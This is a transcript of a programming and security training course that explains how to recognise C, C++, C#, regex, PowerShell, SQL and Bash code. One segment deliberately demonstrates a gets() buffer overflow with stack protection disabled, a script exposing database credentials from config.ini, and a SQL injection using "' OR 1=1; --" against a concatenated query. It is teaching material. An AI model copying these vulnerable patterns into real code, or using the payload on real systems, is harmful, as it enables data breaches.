In this video, I'll describe elements of a typical C++ program so you can easily identify one when you see it.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/identifying_cpp_programs$. [Video description ends]
So let's start in this folder identifying cpp programs and we'll run ls.
So the files in this folder is very much like that of the C program in the video titled identifying C programs.
We have the configuration script the MakeFiles of the build tools using auto tools for canoe make. And to
build it, we would do a ./configure, and then make or make clean if we want to clean the files and make it
again. So very typical compilation procedure using make. But before we run it let's have a look at the c++
source code in the Hello World cpp file.
Now, typically c programs have the .c extension and C++ has the .cpp extension. So I'll use nano to open
hello_world.cpp. So this is a very simple C++ file.
[Video description begins] The hello_world.cpp file opens. It has eight lines of code. [Video description ends]
And at the top of it, we have an include preprocessor directive. We have the # symbol include just as we do in
C programs.
And then in <>, we have the standard library include from iostream for input/output stream. Now typically
standard library includes have angle brackets, but no .h extension like we do with C. Now although we could
do that, we could include stdio.h.
[Video description begins] He enters a code in line 2. The succeeding code lines shift a line down. [Video
description ends]
We can use some of the C includes inside of c++, but most often we want to stick to the c++ standard library
includes. But there is some portability between the two.
[Video description begins] He removes code line 2. The succeeding code lines shift a line above. [Video
description ends]
So I'll save this again and the main function is identical to a C program.
So we have int main, and in parentheses we have the parameters int argc, the argument count, and then we
have char* of argv with the double brackets. So we have the argument values, if these arguments are passed to
the function. When we printed the standard output, we don't use printf and C++, well not typically. We usually
use the iostream cout.
There's also a namespace specifier followed by the double colon. So we have std for standard ::cout for output.
And then we have this operator this double angle operator so << . Then we have a string "Hello, World!"
followed by another operator an output operator. So the << and then std::endl for endline. Now we can also put
the end line right inside of our "Hello, World!" and put a \n, it works the same way as it would in C. But we
also have this special specifier from the iostream library for ending a line and then we return zero for success.
And you'll notice that the statements in C++ like C also have semi colons to close them and functions are
enclosed in braces.
[Video description begins] He points at code lines 3 and 8. [Video description ends]
Another thing we see quite often is using namespace directives. So we could type using namespace std; then
we can remove the std specifiers it just have cout and endl, so we see this quite often as well.
[Video description begins] He enters a code in line 2. The succeeding code lines shift a line down. [Video
description ends]
[Video description begins] He modifies code line 6. It now reads: cout << "Hello, World!" << endl;. [Video
description ends]
But this makes up a common C++ program which differs it from common c program. Then I'll save this, I'll
remake it, and now I'll run hello_world to make sure we get the output Hello World and we do.
[Video description begins] The hello_world.cpp file closes. The screen shifts back to the terminal. [Video
description ends]
Upon completion of this video, you will be able to describe the similarities and differences of C# when
compared to C and C++.
Objectives
[Video description begins] Topic title: Identifying C# programs. Your host for this session is Steve
Scott. [Video description ends]
In this video, I'll describe similarities and differences of C# when compared to C and C++. So C sharp is
written with the C and the hash symbol, and pronounced obviously C#. It's a general-purpose multi-paradigm
programming language. The general purpose part of this description comes from the fact it's used for many
different application, for GUI applications on PCs, server applications, web applications and basic scripting.
It's also multi-paradigm, in that it has options to program imperatively, functionally, with the use of
declarative, generic, and object oriented constructs. It's also strongly typed, which means variables must have
an associated type, or declared implicitly type with the bar keyword. So C# is both similar to and heavily
influenced by C, C++ and Java. C# was introduced around the year 2000. I felt at that the time it was a
response to Java with similarities, and targeting the same space of the developer mindshare. It was Microsoft's
response to Java.
But since then, it has forged its own path both influencing the development of C++ and Java and being
influenced by these other languages by C, C++, and Java. So what are some of the common syntax elements of
C#? This is where the similarities to other languages such as C, C++, and Java show up. Statements end with a
semicolon. Blocks are defined within curly braces. Square brackets are used for indexed notation as in arrays,
and has other things that are similar to the C style languages, especially C, C++ and Java.
But there are some identifying features Unique to C#. There are no global variables in C#, and that's not the
case in C and C++. There's implicit variable declarations. It supports implicit declarations using the var
keyword so that the type can be inferred. We have type safety. So C# is more strict than C and C++, in that
type conversion must also be safe, and it's enforced not only at compile time but often in runtime as well. And
there's no variable shadowing, so you can have variables of the same name on different block levels inside of
the same area.
So you have one outside of the block, and one inside with the same name. This is allowed in the C and C++,
but not in the C#. Now, let's have a look at some code.
[Video description begins] A screenshot appears on the screen. It has some code lines. [Video description
ends]
The first line you see in many C# programs is a using statement like using System. So in C#, the using
keyword includes external packages in the program as well as the namespace. This differs from C and C++
where we most often see the include keyword as the first statement in our code. And in Java and Python, you
see import keywords used for this purpose at the top of a program. To specify the namespace for a class, we
use the namespace keyword. So we're defining a namespace here. And then the body of the namespace is in
curly braces.
And then we usually have a class, as here I have class Hello. Then another block that opens the definition of
the class which defines a main method. So this is the main entry point. So C, C++, and Java all have these
main entry points. But they're all defined slightly differently. Now this one looks a little bit more like Java's
but it is very different from C and C++. So in C and C++, the main function is not within a class, and C and C+
+ return in int and main is in lowercase. And then we have our body of the method also with an open brace.
Then to write to the standard output, we have Console.Write and then some string. In Java, we would have
System.out.write. In C, we typically use printf. And in C++, we use cout. And then we have to make sure all of
the braces are closed, to close out these methods. And that concludes this presentation on identifying C#
programs.
[Video description begins] Topic title: Identifying Regular Expressions. Your host for this session is Steve
Scott. [Video description ends]
In this video, I'll discuss identifying regular expressions found in typical regex engines. So how do we usually
think about regular expressions? Well, we think of them as search patterns to find something, to find a word, a
bunch of characters, numbers, any text within a larger corpus. For example, you might be looking for
combinations of letters and numbers, say five digit zip codes or five or six letter number combinations for
postal codes in some countries. Or matching emails or URLs, or IP address formats.
Not just to find them but also to verify their validity. So regular expressions solve the problem of Find and
Find and Replace, so performing substitutions. You can think of a regular expression find and replace task as
either a straight substitution of words, or expressed in a pattern much the same as a find and replace would be
performed on a document using a GUI application. So in a word processing application, it gives you a visual
way to accomplish the find and replace task.
In a command line script or program, incorporating a regular expression gives you a programmatic way to
automate the substitution so we can do it in code. What makes up or defines regular expressions? Well, we can
think of them as formal languages. So it's defined formally, mathematically, in terms of Formal language
theory. And the syntactic structure of how the grammar of regular expressions is defined is done in such a way
that it can be analyzed systematically. It's Expressive and Compact.
Giving a concise way to express matches and operations to determine matches based on character
combinations. And there are Standards behind regular expression syntax. So there's the IEEE POSIX, or
extended regular expressions with implementations following these. Now what are some of the ways that we
can describe the conceptual elements of regular expressions? In the language of regular expressions we get the
Boolean "or". So given a set of characters or strings or patterns, we can match alternatives using a logical or
typically denoted with the pipe character.
We get Concise groupings, using parentheses as we would in logical or mathematical expressions to control
operator precedence. So we can group characters, quantifiers, and wildcards together. We have Quantifiers
usually question marks, asterisks, plus signs and braces with min max and numbers. This determines how
characters and groups of characters are matched. And we have Wildcards such as the period or dot operator,
which can match single or multiple characters when combined with other quantifiers.
Each implementation of regular expressions has its own flavor or syntax for expressions which can be
confusing, but they all generally provide the same conceptual elements. They're all feature similar but not
always with the same syntax. So in a typical POSIX standard, the meta characters or important symbols are as
follows. We get the backslash '\' escape character. So if we need to include a backslash in our regular
expression, we have to escape it with a backslash.
The ? which matches the preceding element zero or one time, the * which matches preceding element zero or
more times, the + operator which matches proceeding elements one or more times. The ^ matches the starting
position of any line. The . matches any single character. We have [] bracketed logical expressions using the
brackets. And we have the [^] bracketed knot expression with the carrot. And we have a $ sign that matches,
which looks for a match at the end of a line or the end of a string. Now what are some examples of how these
are implemented?
Well .ing would match words ending in 'ing' like ting and zing, ping, etc. If we have [tc] with 'rying', this will
match the words 'trying' and 'crying'. If we have the [^p] followed by ing, we'll have all the same matchings
as .ing except for 'ping'. Fox$ matches any lines ending in 'fox' and ^Fire matches any lines starting with 'Fire'.
Of course there are extensions and additions based on what you've seen here, but all implementations of
regular expression engines are based upon these foundations. And that concludes this presentation on
identifying regular expressions.
During this video, you will learn how to identify PowerShell scripts based on their features.
Objectives
[Video description begins] Topic title: Identifying PowerShell Scripts. Your host for this session is Steve
Scott. [Video description ends]
In this video, I'll discuss how to identify PowerShell scripts based on their features. So let's start by talking
about the main elements that define PowerShell. We start with Shell commands called cmdlets. But they're not
typical commands, such as what you would find in Bash or other Shell environments. It's better to think of
them as command classes that process class objects as input and return objects as output. They're based on
the .NET framework classes that run in the PowerShell runtime. Then we have Pipelines, connecting
commands together.
Again, like you would see in other shells like Bash, but instead of passing strings between commands, you pass
objects. Then we have PowerShell Scripting, that's built on top of .NET with full featured language
capabilities, variables, operators, loops, associative arrays, and regular expressions. And in PowerShell scripts,
these can be built, and tested, and debugged in an integrated scripting environment or lSE. Now, what are
some more important features of PowerShell? Well, we have the .NET integration.
This is what gives PowerShell and commandlets their capabilities. So we can do much of what can be
accomplished, in an equivalent GUI application, and sometimes more. That makes Administrative task
automation easy, so you can automate repetitive manual steps using PowerShell scripts, and Configuration
management. So we can use PowerShell scripts to configure our computers, our PCs and our servers. So what
are some of the main elements of the PowerShell design? So we get Discoverability.
So it's improved over some other Shell environments. And we use the Get-Command and Get-Help to achieve
this. Consistency, PowerShell uses a Verb-Object naming convention for commands in a consistent interface
through the commandlets, so that any inconsistencies of the underlined .NET or component object model
objects can be obstructed away. It's Scripted and interactive. So .NET and command line tools have developed
in environments to help. PowerShell can use command line tools, comm objects, dotnet classes.
So we combine the best of interactive Shells, scripting and system administration into a single tool. And in this
case, the Powershell integrated scripting environment is an application in modern Windows that we can use.
The nice thing about this, as I mentioned, in the Powershell design, it makes discoverability much easier. So
one of the advantages of using the ISE is it's GUI environment. We can often navigate visually through the
application through menus, dropdowns, tabs, help, etc., to find what we're looking for and discover capabilities
by trying things.
There are many shell environments that we don't have this. With the Windows PowerShell ISE, some of that
gap is closed and we can discover and explore various commands visually. Even though the end target is a text
driven interface or a PowerShell script. And that concludes this demonstration of identifying PowerShell
scripts.
[Video description begins] Topic title: Identifying SQL Code. Your host for the session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to identify the elements of a SQL statement.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/identifying_sql_code$. [Video description ends]
Now, there are SQL standards and some variations,depending on the database management system, the flavor
of SQL one uses. In this example, I'll demonstrate using SQLite, which is a brilliant little tool to manage local
databases in file form without servers or worries of multi-user environments which is a great way to
demonstrate this. When you need a database for a single-user application or personal database of things,
SQLite is a good tool.
It also makes it easy to demonstrate some basic SQL without having to do a major install. On an Ubuntu or a
Debian-based system, you can do sudo apt install sqlite3. Now I already have it installed, so I don't need to run
that command, I just need to type sqlite3 to run it. Now before I do that, in my current folder, I have a file
called person.sql.
[Video description begins] He enters the ls command. A file named person.sql appears in the output. [Video
description ends]
Now most often, when you see this, where there's a SQL extension, it means it's a text file with SQL
statements in it. So let's open this up with nano and have a look.
[Video description begins] The person.sql file opens. It has fourteen lines of code. [Video description ends]
Now, the first line has a --SQLite SQL script. So the -- is a comment, so whatever comes after it is a comment.
You can also have C style comments with /* and */ to close it. So anything within the confines of the /*, you
can have comments to explain what's going on.
Now the first statement is a create table statement. So we have create table, and then the name of the table.
So this will be tabular data of people, so we call it person. And then in parentheses, we define the columns or
fields within the table. So the first field is id, it's of type integer, it's a primary key, which means it must be
unique. And it's in autoincrement.
So it'll start off at one, and for each user, it will increment that, two, three, four, five, etc, each time we add a
new person. It has a name field, which is of type text, and it's set to not null.
So this specifier says this can't be a null value. So we have to have a string in this record, as well as email. So
we have, email text not null.
And then we close the statement, we close the parentheses defining the definition of the person table, and end
it with a semicolon.
[Video description begins] He points at code line 11. [Video description ends]
Now I don't have to specify the id column because it's going to be autopopulated with the autoincrement. It has
values, and in parentheses, I have the string in single quotes 'Steve', '[email protected]', also in single
quotes then I close the parentheses, and I end the statement with a semicolon. And I do this exact same thing
with values for Robert and [email protected], Jessica and [email protected], and Jane with
[email protected].
[Video description begins] He points at code lines 12-14. [Video description ends]
So those are the four users I'd like to insert into our table. So now I'll exit out, and to run this, I can do sqlite3,
then I specify a database name.
[Video description begins] The person.sql file closes. The screen shifts back to the terminal window. [Video
description ends]
I'm going to call this person.sqlite. And then I use my input redirection operator, so the < symbol, and then the
file, person.sql. So this will run the commands on this database. And now if I do an ls, I have person.sqlite
created and I can open it running, sqlite3 person.sqlite.
[Video description begins] The command prompt changes to sqlite>. [Video description ends]
And then I get into a sqlite command line interface. So I can type .help to get help, and I can run things
like .schema, which will show me the schema or the definitions of the tables and entities within the database.
So I have a table called person that we created, but it also creates another table called sqlite_sequence so that it
can maintain the number of the autoincrement for us. And now if I do a select * from person, another SQL
statement, ending it with a semicolon, it selects all the people from the person table.
So we have 1, 2, 3, 4, so their ID, their names, and their email addresses. Now some other SQL commands that
you might come across are delete, so we delete from person, so delete from a table where name = 'Steve'. So
the SQL statements follow this very command-driven declarative statements and inside a sqlite, I can arrow up
and rerun commands. So you can see now if I select * from person, Steve is gone. I can also do wildcard
searches, so select * from person where name like, and in single quotes, I put 'J%'. So % being the wildcard, it
selects all names that begin with J, so I get Jessica and Jane.
And I can also specify fields, I can say, select name from person, and it will just return the names. So these are
all examples of SQL statements and SQL code. So if you see statements, create table, insert, update, delete,
select from a particular entity with where clauses, you're most likely dealing with SQL statements. And that
concludes this demonstration of identifying SQL code.
[Video description begins] Topic title: Common Code Vulnerabilities. Your host for the session is Steve
Scott. [Video description ends]
In this video, I'll describe common security vulnerabilities in code that can lead to exploits.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/common_code_vulnerabilities$. [Video description ends]
So, I'll start with the C buffer overflow. So I've called this buffer_overflow.c. So I'm going to open it up with
nano.
[Video description begins] A file named buffer_overflow.c opens. It has thirteen lines of code. [Video
description ends]
And we can see what's going to happen here. I start with an include of stdio.h, and I include string.h.
[Video description begins] He points at code lines 1 and 2. [Video description ends]
Then in the main function, I declare a char buffer of size 5. So I've char buffer in square brackets, it's 5.
So this can hold 4 characters and a null terminator for dealing with the string, or it can handle 5 characters in
all. Then I have int ok = 1. Then I call gets with buffer as its argument.
[Video description begins] He points at code line 6. He points at code line 8. [Video description ends]
So this will accept user input. And I can type in a number of characters and it will store it in buffer. Then you
can all probably already see the problem here. If I type more than 5 characters, we're going to have a problem.
Then I do a printf of %d\n, ok.
[Video description begins] He points at code line 10. [Video description ends]
[Video description begins] He points at code line 12. [Video description ends]
So I'll exit and do a gcc of buffer_overflow.c. And I'll output it to buffer_overflow. So -o buffer_overflow. So
this gives us a warning saying that gets function is dangerous and should not be used, while doing everything it
can for me to prevent a buffer_overflow. So if I do a ./buffer_overflow, and I type, let's say, 123456, It gives
me stack smashing detected, unknown terminated, aborted (core dumped).
So what's happening here is that gcc actually puts in some extra code to prevent this kind of stack smashing or
buffer overflow on the stack, which is what I'm trying to do here. Now, there's an option I can supply when I
compile it. I do gcc -f. So this flag, I'm going to put no-stack-protector. So I'm going to remove this protection.
And now I'll run the program again, and I'll type 123456.
And then something funny happens. The variable ok outputs 54. So it does these weird sort of things. And in
this case, if I type 12345, it outputs 0. So it actually modifies the variable ok because we're going past the end
of our buffer and running into the stack space reserved for the int ok. So this is the basic idea behind
buffer_overflows at least in terms of the stack. And because this is such a common problem, mitigations for
this are built right into the compiler by default. So this is something that happens very often. Now, let's look at
another one. So in my current folder, I'll run ls. There's a few files, there's one called script.py. So let's look at
this one next. So nano of script.py.
[Video description begins] The script.py file opens. It has seven lines of code. [Video description ends]
And this is running a subprocess, a shell process from within another program. So I have this Python script.
[Video description begins] He points at code line 1. It reads: *!/usr/bin/env python3. [Video description ends]
I create a command which is equal to a list of values with cat. So that's the function that's going to run, and its
parameter config.ini.
Now, what happens is if Python is running on a web server, and somewhere in the script, and it accepts input
from the user say to reform, then within its code, it runs a shell command. If the user can get input into the
shell command, it can execute what whatever it wants. So this leads to a lot of exploits as well. So here, I have
result = run with the command. So cat of config, standard output=PIPE, standard error=PIPE,
universal_newLines=True.
[Video description begins] He points at code line 6. [Video description ends]
[Video description begins] He exits out of the script.py file. The screen shifts back to the terminal
window. [Video description ends]
So now if I run the script, it does a cat on this config.ini file which gives some information about the database,
including the host, the database, the user, and the password. So quite often web apps have some configuration
file somewhere that declares information like database connection strings or root user accounts. And this can
be used to gain access and breach data. And now the last example is called a SQL injection attack. So this is
modifying a SQL statement to do something other than its intended behavior, which is often used to gain
access and breach data as well. So, I'm going to open up the script select person. So, nano select_person, which
is a bash script.
[Video description begins] The select_person file opens. It has seven lines of code. [Video description ends]
Then I construct a SQL query. So I have the variable query = strings *select * from person where name = and
in single quotes, I have '$1'. So this will be the first parameter passed to this select person bash script.
Then I echo the query. And then I call sqlite3 of person.sqlite and I pass this query to be executed.
[Video description begins] He points at code line 5. It reads: echo "$query". [Video description ends]
[Video description begins] The screen shifts back to the terminal window. [Video description ends]
So under normal operation, I run select_person, and I put a person's name, let's say, Jane. And it returns Jane
from the database. So select * from person where name = Jane. So that looks fine. But what if I call
select_person and I put a string with " 'OR 1=1; and then a comment, a -- " and I put that as the string I'm
going to pass into it. Well, this is going to do some funny things. Any select statement with a clause OR 1=1,
since 1=1 is always true, it will return everything.
So in this case, the query becomes select * from person where name = double quotes double single quotes, so
name equals the empty string, but then I have OR 1=1 followed by a semi colon and the -- escapes that final
single quote, so it doesn't get parsed. And this will be just like running select * from person, so it returns
everybody in the database. So, instead of the intended single person returned, it returns everyone. And we've
just breached the data from the entire person table. And that concludes this demonstration of common code
vulnerabilities.
In this video, you will learn how to identify the structure of common executable formats based on their binary
signatures.
Objectives
identify the structure of common executable formats based on their binary signatures
[Video description begins] Topic title: Identifying Binary Files. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll present some important information about how to identify the structure of common
executable formats based on their binary representation technically speaking, all files are in Binary. But what
we need here is non-text file. Now, Text files are binary representations of individual characters using a
standard representation like Unicode. In what we call binary formats, there is no standard representation based
on characters. It's based on whatever information it is chosen to represent.
The binary information could be colors and pictures, sound descriptions of waveforms, machine instructions
and compiled computer programs, or any other representation of values that are chosen by whatever
programmer wrote the code that ultimately created the file. What are some common binary executable files?
Well, we can think of these as programs with instructions that correspond to how your operating system and
processor will execute the instruction.
We can think of compiled machine code, byte compiled code where there is a virtual machine that translates
the bytes in the file to machine code in real time such as the Java Virtual Machine, or JVM. We also have
linked libraries. Libraries have compiled code that are called by other programs. These are un-editable which
means they must be compiled from source. So you don't change a program by editing the binary executable.
You change the source code and you recompile it into the binary format.
You can view the binary format but you need what's called the Hex editor which displays the individual bits or
groups of bits within the file as hex digits. And it's very rare that any of these would need to be edited directly,
but it is possible. What are some other binary signatures for non-executable programs? The main example of
binary files that are non-executable are images, any image format, video formats, and audio format. It's easier
to talk in terms of hexadecimal representation when talking about binary signatures.
So we're looking at values in base 16 numerical representation. So it's the digits from 0 to 9 and a to f. So these
take up four bits. So you can look at each group of four bits in a Hex editor, looking at the digits in terms of
their hex representation. This is an alternative to base 10 or decimal format. So this is instead of using our
normal numbers from 0 to 9 to represent the digit. It's much easier to work in base 16 because it's a power of 2.
In Decimal, if we have the number 255, it's represented as ff in hexadecimal.
And then if we're dealing with this in a programming language, it's often preceded with 0x to denote
hexadecimal. So if you're using C or C++, you'll write hexadecimal digits as 0x, for example, 0xff. Let's look
at some examples of Common Executable Formats and Common Non-Executable Formats that are in binary
form. Well, we have the usual exe which is quite often associated with Windows programs. We have dlls for
dynamic link library. So these are code libraries that are called by executable programs on Windows
computers.
We have so which is the shared object that we typically see on a Linux environment. So this could be
considered the Linux equivalent to dlls. The ipa file, so this is an Apple format for the iOS app store package,
which packages up the executable file for an iOS app along with its other resources that are needed to run the
program. We have bin files. So this is sometimes added to a binary executable in some systems to denote that
it's a binary file. If we have a dot o file, these are object files that are created by compilers before they are
linked into the final program.
And we have Java files, the jars, the war files and the class files that package up Java programs or the classes
themselves which are the bytecode for a Java program. Now a common non-executable formats, well, image
formats, we have gif, jpg, and bmp files for bitmap files. We have mp3 files which are audio files and mp4
containers which contain video formats, mov files for movies, avi files for Windows video files.
We have wav formats, which is another audio format, zip files which are archives of other files. Now the zip
file itself is a binary file. But the contents of the zip container don't necessarily need to be binary files. There
can be text files inside of a zip, but they get compressed into a particular binary format. And that concludes
this presentation on identifying binary files.
Learn how to verify the integrity of a downloaded file based on its hash value.
Objectives
[Video description begins] Topic title: Verifying Downloaded Files. Your host for the session is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how to verify the integrity of a downloaded file based on its hash value.
[Video description begins] A terminal window opens. The command prompt is:
steve@vm1:~/Documents/verifying_downloaded_files$. [Video description ends]
The way this is accomplished is that we produce a signature based on the data that we're putting into a hash
function. So we take the file, we put it through this hash function, and it produces a signature of fixed size. In
the case of this video, we're going to use a 256-bit signature. So this is a way of validating the integrity and
authenticity of a file. So let's have a look in the current folder in this verifying_downloaded_files folder I have.
So I'll do ls -l, and there's four files in here now. One is a bash script called download_kali_files.
So, if we do cat of download_kali_files, we see that there's some curl statements. There's one that downloads
an iso image to install kali-linux and then there's two other files. There's the SHA256SUMS.gpg and
SHA256SUM. So these are the files that we can use to verify the signature. So the person who created this iso
image, created a signature of it, using the created image. So the image file, this ISO file, is a very large file.
Now, if we wanted to know the exact size, we can do, ls -lah. And this file is 2.8 gigabytes, so taking the whole
thing.
So the person who creates the ISO image created a signature of it. Then after we download the file, we verify
that the signature that we get, by computing it ourselves using the ISO file, is the same as the creator of the
ISO image got when they ran it. Otherwise, if they're different, the integrity of the download may have failed
either by transmission error or by a tampering attack. Possibly due to a man-in-the-middle attack which
modified the file in transmission.
So we should always verify our downloads. So, I've already predownloaded the files by running the
download_kali_files Bash script. It's a 2.8 gigabyte file, so it would take some time to download, so I wouldn't
want to do it during the course of the video. But after that file is run and we've downloaded the ISO image and
its signature, so we can calculate it using sha256sum of kali-linux on the ISO file. And it should take a few
moments, but it'll give us this long hexadecimal value that we can use to verify it with.
So here it gives us the hexadecimal value and the name of the file. So the way to do this is if we do a cat of
SHA256SUMS, we can see that there's this kali-linux-2020.1-live-amd64.iso that matches what we have that
we generated. Now, there's a quicker way to do this, we don't have to eyeball it or cut and paste it and line it
up. We can just use grep, I can do a grep of kali-linux-2020 and SHA256SUMS aAnd we'll pipe that into
sha256sum, the actually program, -c.
So you can think of this as confirming it, so it will compare and find the signature and the file within this. And
when it finds it, it should give us an OK, and it does. So the signatures match, but there's a little bit of a
problem here. In the download, if I do a cat of download_kali_files, you'll notice that all of the transfers were
done over HTTP. Ideally, you'd prefer to download the iso image over HTTPS as well as the signature files.
That will limit the attack surface, at least in terms of a man-in-the-middle attack. So now to verify it, we're
going to use HTTPS and get the GPG key from Kali Linux, so from kali.org. So I'll do curl of
https://www.kali.org/archive-key.asc and we'll pipe that into gpg --import. So we've imported the key, now
let's check its fingerprint. So gpg --fingerprint. And then we can copy the key fingerprint, paste it. So now we
have our fingerprint. Now, using this we can verify that our SHA256SUMS the actual signatures we have, are
valid. So we can do, gpg --verify, and SHA256SUMS.gpg and SHA256SUMS.
[Video description begins] A few gpg output appears. [Video description ends]
So what we're looking for here is good signature. So a good signature from Kali Linux Repository
<[email protected]>. So this is what we're expecting to get. So we've successfully verified the signature. And
that concludes this demonstration of verifying downloaded files.
14. Video: Course Summary (it_cypgsodj_02_enus_14)
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined how to identify code used in security applications and exploits for a number
of different programming languages including Python, C, C++, and SQL. We did this by exploring common
programming paradigms and their features. How to identify Bash and Python scripts. The elements of a
common C and C++ program. The similarities and differences of C# compared to the C and C++ languages.
Regular expressions in typical regex engines. And how to identify PowerShell scripts and the elements of a
SQL statement.
Common security vulnerabilities in code that can lead to exploits. Executable formats based on their binary
signatures. And how to verify the integrity of a downloaded file based on its hash value. In our next course,
we'll move on to explore the elements used in common Bash and Python scripts. Including how to use these
elements in basic script.
Objectives
[Video description begins] Topic title: Course Overview [Video description ends]
[Video description begins] Your host for this session is Steve Scott. He is an IT consultant. [Video description
ends]
IT consultant for almost a quarter of a century. I've traveled around the globe to serve clients responsible for
building software architectures, hiring development teams, and solving complex problems through code. With
my toolbox of languages, platforms, frameworks, and APIs, I round up my coding experience with a formal
background in mathematics and computer science from Mount Allison University.
In this course, we're going to explore Bash and Python scripts, including how to work with some of the
common statements and loops used in these scripting languages. I'll start by examining the elements in a
scripting language as compared to a full fledged computer program. I'll then demonstrate how to use and set
variables and use conditional statements in Bash scripts. Next, I'll show you how to use the for while and until
looping statements, and create custom functions in Bash scripts.
I'll continue with the Python scripting language and demonstrate how to work with variables, conditional
statements, and the for and while loop statements in Python scripts. I'll then show how to create custom
functions and import external modules in Python scripts. Lastly, I'll demonstrate how to perform file
operations and make URL requests in Python scripts.
After completing this video, you will be able to describe the elements that make up a scripting language as
opposed to a full-fledged computer program.
Objectives
describe the elements that make up a scripting language in contrast to a full-fledged computer
program
[Video description begins] Topic title: Introduction to Scripting. Your host for this session is Steve
Scott. [Video description ends]
In this video, I'll describe the elements that make up a scripting language. In contrast to a full-fledged
computer program and general-purpose programming. So what is scripting? And what defines our general idea
of a scripting language as opposed to a general-purpose programming language? How are they used? And what
class of problems do they address? Well, a scripting language, it's not so much the language itself.
Even though some languages like Java or C++ and C# are rarely thought of as scripting tools. It's best to think
of scripting as a property of a language. A language like Python or JavaScript can be used for scripting and for
general-purpose programming of larger more comprehensive applications. So what are some common
properties of scripts? Well, they're often purpose built for accomplishing a single task. And they're often small
programs written in a single file, or even written on a single line of code within the file.
Often in the form of a long one liner compound statement. They require fewer declarative statements. And
scripts are most often interpreted. Whereas large programs are more often compiled, both in the case of
machine-compiled or byte-compiled, like Java. They're often used interactively. So they have text-based
prompts that make repetitive tasks less tedious. With stops to allow a user to enter yes or no or small inputs
where options are needed. They're more frequently written by users rather than by software developers.
For the automation of tasks and scheduling tasks and having some control over typical jobs that are done on a
computer. And they're usually built-in. Shell scripts like Bash or languages like AWK, Perl, and even Python
are installed by default on many systems. What are some examples of common tasks for scripts on a server?
Well, we have backup procedures. So performing backups such as archiving old data or older log files, so that
we can aggregate them and analyze them. We often monitor for significant events, and we haven't event
notifications.
So automated emails or text messages or alerts of some kind that alert a system administrator or developer of
some software application. We do summary computations, such as creating reports and statistical summaries,
calculating sums and averages. Now what are some areas that scripting languages are typically best at?
Well basic automation, the simplifying repetitive steps. Anytime you find yourself repeating the same
commands over and over again, it's a prime target for automating. Even things in graphical applications and
documents and spreadsheets. Simple yet manually intensive tasks that take up time. Such as word
substitutions, cutting and pasting, file renaming and copying, and aggregating data from within files.
Quite often we find ourselves with manual tasks like this that take up time, say 30 minutes every few days.
And over the course of a year, that can really add up. So there's typically an upfront cost in time, say a few
hours or a few days, to write a script that automates a task. But that investment pays off pretty quickly in the
time saved in the long run. That's what computing is really all about. We can also apply this to periodic jobs.
Then not only do we automate tasks using a schedule at a particular day of the week or time of day, or even
every hour, if that's needed. Or even every few minutes. Every operating system has a task scheduler of some
sort, like a crontab in Unix-based systems. That we can use to run scripts when you need them to perform their
task. And that concludes this presentation on scripting.
[Video description begins] Topic title: Bash Variables. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to use and set variables in a bash script. And I'll cover some important built-
in variables.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder, I have a file called variable. This is a bash script. So I'm going to open it with nano. So
nano of variable. And here I have the code. So I start with the usual bash shebang at the beginning of the code
with #!/bin/bash. And then we get on to simple variable assignment. So I have the first variable called name. I
set it equal to the string Steve with the string enclosed in double quotes. Then I assign two numeric variables, a
= 1 and b = 2. Now let's see what we can do with it.
Well, we can do some simple concatenation either by embedding a string into a literal string. So I have echo
and in double-quotes, I have the literal string Name with a colon and a space. And then to insert the name
variable inside of the string when we reference a variable, we put a dollar sign in front of it.
So I have $name. Then the next echo, I have echo of $a+$b. Now, these are numeric variables. And in many
languages, what you would get is 1+2 so the result would be 3. But in this case, in bash, it's going to
concatenate them. So we're going to get the actual string 1+2. And it's going to be echoed literally to our
console. If we want to get 1+2, get the result 3, we need to perform an arithmetic expansion.
And for that we put double parenthesis around the expression. So I've echo dollar sign double parenthesis
open. $a + $b, and then close the double parenthesis. So this should print 3 for us. When command line
arguments are passed into bash scripts there's a particular way to reference them. We can get the number of
arguments. So in this echo I have echo of the string Argument count. And then $#, which will give us the
number of arguments. We want the argument values, we use $@.
So the @ symbol. If we want to get just the first argument, we use $1. And the second argument is $2. There's
also a number of built-in variables. If we want the current file name, we use $0. The process number is $$, so
two dollar signs. If we want the time format we use $TIMEFORMAT, all in uppercase. And the Current Path
is $PWD. Now at the end of a program, if all is successful, our bash script returns 0. But we can be explicit
about it by using exit of 0. So if at some point in our program, if we got into a condition that wasn't expected
and we wanted to return a failure, we could use exit with some number other than 0.
Now I'll exit out of this code and we'll do ./variable to run the program. Let's have a look at the results. Now
we get the name is Steve. $a + $b returned 1+2 literally. But then when we put it inside of the double
parenthesis, it performs the arithmetic expansion and we get 3. Now I didn't pass any arguments to this script.
We have Argument count: 0. So no Argument values, nor First, nor Second is set. So these are all empty.
The current file name is the ./variable so what we use to run it. The process number is 6429. Now the built-in
time format in this case is not set so we get nothing printed here. And then the current path is
/home/steve/Documents/bash_variables.
Now let's try running it again. But let's pass in a couple of arguments. Let's pass in the arguments, let's just
give it some numbers, 123 and the number 456. So in this case if we look at the Argument count we get 2, the
Argument values, 123 and 456. So the First argument is 123, and the Second is 456. And that concludes this
demonstration of bash variables.
[Video description begins] Topic title: Bash Conditionals. Your host for this session is Steve Scott. [Video
description ends]
In this video, I'll demonstrate how to use conditional statements in a Bash script and a Bash shell.
[Video description begins] The screen displays a Terminal window. [Video description ends]
So in my current folder in this bash_conditionals folder, I have two files. Conditionals are Bash script and
file.txt, that I'm going to use from with inside the script. So now open the script using nano, so nano of
conditionals opens our file. And it begins the usual way, with the Shebang, with #!/bin/bash. Then the first
conditional, the first if statement, is if, then I use the double brackets.
[Video description begins] The square brackets are used in this line of code. [Video description ends]
So conditionals typically fall within double brackets unless they're arithmetic conditionals, which I'll get to
next. So I've, in double brackets, -e file.txt. So you can think of -e as if exists file.txt. So return true if file
exists. If file.txt exists, otherwise it returns false and it won't get into the if block.
So after the double brackets, I have a semi colon, which is required, and the keyword then. And what comes
next is the interior of the if block. So I echo file.txt exists, just saying that the file exists if the condition is true,
then we end the if block with fi.
